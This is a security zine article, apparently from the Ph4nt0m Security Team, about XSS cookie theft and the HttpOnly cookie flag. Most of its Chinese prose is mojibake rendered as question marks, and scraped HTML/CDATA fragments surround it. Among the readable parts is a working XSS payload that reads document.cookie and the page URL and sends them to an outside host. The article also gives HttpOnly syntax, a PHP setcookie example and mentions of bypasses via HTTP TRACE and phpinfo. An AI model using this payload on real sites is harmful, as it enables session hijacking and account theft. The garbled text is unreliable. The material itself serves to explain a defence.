|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |
==Ph4nt0m Security Team==
Issue 0x01, Phile #0x06 of 0x06
|=---------------------------------------------------------------------------=|
|=-------------=[ ????httponly??????ó?????? ]=--------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=--------------------=[ By ???? ]=--------------------=|
|=--------------------=[ <jnchaha_at_163.com> ]=--------------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
????www??????????????????ó????????B/S???????????????????????
?????????????web??????????????????????????????web???????www??????
????HttpЭ??????Http????????Э?飬?????????????????????????????????
???Cookie????Session????????????????????????????Cookie????Session?????
??????Cookie???????Session??????????????Cookie????????Token????????????
????????Token??????????????????????洢?????????????????????????
??????????????????Cookie???棬????????Cookie?????????????????????
???????????????????????飬???????Cookie??????????????????????Σ????
????????????web?????????????xss??????????????Σ???
??????ó?????????????????xss???????ζ????????????????????????????
js??????????ó?????????????????????????????????????ajax?????Щ???????
????????????????????????????????????????????????????????????????
????ó???????Щ????????web?????web2.0????????????????????????????????
?????????????????????????Bug???????????????????????????????????????
??????????????????????????????????????????ajax????????????????????js
??ú??????????????????????????????????????Ρ???????????xss??????
Cookie????Session???????Ч????????????ó????????????????Щ???????????
??????????????????????????????????
?????λ??Cookie????Session??????????????е?document?????У????????
Cookie?????????????js????????????Cookie?????????????????Cookie????????
????????????????????xss??????????£?
xss exp:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src="http://www.loveshell.net/c.php?c="+cookie+"&u="+url;
?Щ??ó???????????????????????????????????????????罫Cookie??
???????User-agent??????????????????Cookie?Ч???????????????????Ч???
??????????????Cookie???????????????????User-agent?????????????????
??????Cookie??Remote-addr?????????????IP?????????Щ???????IP?????????
???????????????????????????????????????飬????Ip????????£?????????????
??2??IP??????????????????????????á????????Cookie??????????????????У???
?Щweb 2.0??????????????ó????????????
??α???????????Cookie???????????????????????Cookie?????document??
???л???????????????Cookie???????document?в?????????????????????????
????????Cookie???????????????????HttpOnly?????????domain????????????????
?????HttpOnly??????????????????document?????о??????Cookie???????????????
????????κ???????Cookie?????????????з???????????ajax?????????ó?
??????????js???????Щ???Cookie????????Щ??е?Cookie???????HttpOnly????
???Щ???????ó???????js??????cookie????????????????????????Cookie??????
?????????á?????HttpOnly??????????
http://msdn2.microsoft.com/en-us/library/ms533046.aspx??
???????????Cookie??????£?
Set-Cookie: <name>=<value>[; <name>=<value>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
??php???????php 5.2?汾????????Setcookie???????????HttpOnly?????????
<?php
setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);
?>
?????????abc???cookie???????????HttpOnly??document??????????Cookie?????
setcookie????????????header????????????????header??????HttpOnly??????????
document.cookie???????????????????Cookie????????????????????????????
Sessionid?????Щ?????????auth-cookie???????????????????????????Щ?????
???webmail???????????????????????????????????????????????????????
??????????????HttpOnly?????Cookie???
?????????????HttpOnly??????????????????????????xss????????????????
?Щ??????????????????????????????ajax?????????Щ????xss??proxy?????
????????????????????????????????xss??????????????С??????????????????
??????Щ???????????Щ??????????????????????Cookie???????????????á?
HttpOnly???????????Щ???????????Bypass????????????????????????????
??Cookie????????????????????Http Trace?????????????Header???Cookie??
???????????ajax????flash??????????????????????????????ajax??flash?л????
????????????????????????ó????????Bypass?????????????phpinfo????????
phpinfo????????????http?????????????о?????????????auth????????????澭
?????????????????????ajax?phpinfo??棬???header???????????????
Cookie????Щ??ó?????????????????header???й?????????????????basic??
??????????????????????
HttpOnly??IE 6?????Firefox???°汾???????????????????????Hotmail???
?ó??????й???????????????????????????Ч????
-EOF-
|
| |
|
| <![CDATA[<span id="7ztzv"></span>]]><![CDATA[<form id="7ztzv"></form>]]> | | |
|
<![CDATA[<span id="7ztzv"></span>]]> |
|
|
|
|
<![CDATA[<address id="7ztzv"></address>]]>
| |